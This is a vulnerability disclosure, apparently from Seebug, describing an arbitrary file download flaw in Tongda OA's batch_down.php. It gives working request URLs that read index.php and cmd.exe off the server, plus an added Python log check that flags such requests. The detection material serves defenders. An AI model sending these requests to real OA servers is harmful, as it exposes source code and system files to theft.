### Brief description:

An arbitrary file download vulnerability affecting every version of Tongda OA: any file on the host can be downloaded. The latest version from the official website is used for the demonstration:

### Detailed description:

Normal image download:

`http://**.**.**.**/general/picture/batch_down.php?TmpFileNameStr=DSCN0292.jpg|@~@&SUB_DIR=&PIC_PATH=d:/myoa/%D4%B1%B9%A4%BB%EE%B6%AF`

![oa1.png](https://images.seebug.org/upload/201512/02125631b3e4c6c0e5c8ef422253ef68699b9035.png)

![oa2.png](https://images.seebug.org/upload/201512/02125702cbf0b26b31d005ca586aabec6ccb9621.png)

![oa3.png](https://images.seebug.org/upload/201512/02125712a9766111f1e49bbda8d72fdc26bf3f7c.png)

Downloading files by modifying the path:

Downloading index.php:

`http://**.**.**.**/general/picture/batch_down.php?TmpFileNameStr=index.php|@~@&SUB_DIR=&PIC_PATH=d:/myoa/webroot`

![oa4.png](https://images.seebug.org/upload/201512/021257340f80e7e42e5a47508798f0f8b2de785f.png)

![oa5.png](https://images.seebug.org/upload/201512/0212574657426cf6e422e60f579310a8500d361f.png)

![oa6.png](https://images.seebug.org/upload/201512/02125757f9bae3ade27d1d070cf410df57b4b516.png)

Downloading cmd.exe:

`http://**.**.**.**/general/picture/batch_down.php?TmpFileNameStr=cmd.exe|@~@&SUB_DIR=&PIC_PATH=c:/windows/system32`

![oa7.png](https://images.seebug.org/upload/201512/021258470ff00bd297d419e93751cce5737baded.png)

![oa8.png](https://images.seebug.org/upload/201512/02125856f26668ebb0e398c01b6996b1ac9dfbd0.png)

### Proof of vulnerability:

As above.
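
An added example, not part of the original report: a log check that flags `batch_down.php` requests whose `PIC_PATH`, `SUB_DIR` and `TmpFileNameStr` resolve outside the picture directory or name a non-image file. The allowed root, the image-extension list and the reading of `TmpFileNameStr` (file name before the first `|`) are assumptions, and the sample requests are constructed from the three request shapes in the report.

```python
import ntpath
from urllib.parse import parse_qs, unquote, urlsplit

# Assumption: the picture directory from the report's normal request is the
# only root this endpoint should ever serve from.
ALLOWED_ROOTS = [unquote("d:/myoa/%D4%B1%B9%A4%BB%EE%B6%AF", encoding="gbk")]
IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".bmp"}  # assumption
ENDPOINT = "/general/picture/batch_down.php"


def _norm(path):
    """Collapse '..' and mixed slashes Windows-style and lowercase the result."""
    return ntpath.normpath(path).lower()


def inspect_request(request_target, allowed_roots=ALLOWED_ROOTS):
    """Return findings for one logged request target (empty list = looks normal)."""
    parts = urlsplit(request_target)
    if parts.path.lower() != ENDPOINT:
        return []
    q = parse_qs(parts.query, keep_blank_values=True, encoding="gbk", errors="replace")
    pic_path = q.get("PIC_PATH", [""])[0]
    sub_dir = q.get("SUB_DIR", [""])[0]
    # Assumption: the file name is the text before the first '|' separator.
    name = q.get("TmpFileNameStr", [""])[0].split("|", 1)[0]

    resolved = _norm(ntpath.join(pic_path, sub_dir, name))
    findings = []
    roots = [_norm(r) for r in allowed_roots]
    if not any(resolved.startswith(r + "\\") for r in roots):
        findings.append("path outside picture root: " + resolved)
    if ntpath.splitext(name)[1].lower() not in IMAGE_EXTS:
        findings.append("non-image file requested: " + name)
    return findings


# Constructed log entries reusing the three request shapes shown in the report.
SAMPLE_REQUESTS = [
    ENDPOINT + "?TmpFileNameStr=DSCN0292.jpg|@~@&SUB_DIR=&PIC_PATH=d:/myoa/%D4%B1%B9%A4%BB%EE%B6%AF",
    ENDPOINT + "?TmpFileNameStr=index.php|@~@&SUB_DIR=&PIC_PATH=d:/myoa/webroot",
    ENDPOINT + "?TmpFileNameStr=cmd.exe|@~@&SUB_DIR=&PIC_PATH=c:/windows/system32",
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(inspect_request(req) or "ok", "<-", req)
```

The same resolve-then-compare check, applied server-side before the file is read, is what confines the endpoint to its picture directory; a client-supplied absolute `PIC_PATH` should not be trusted at all.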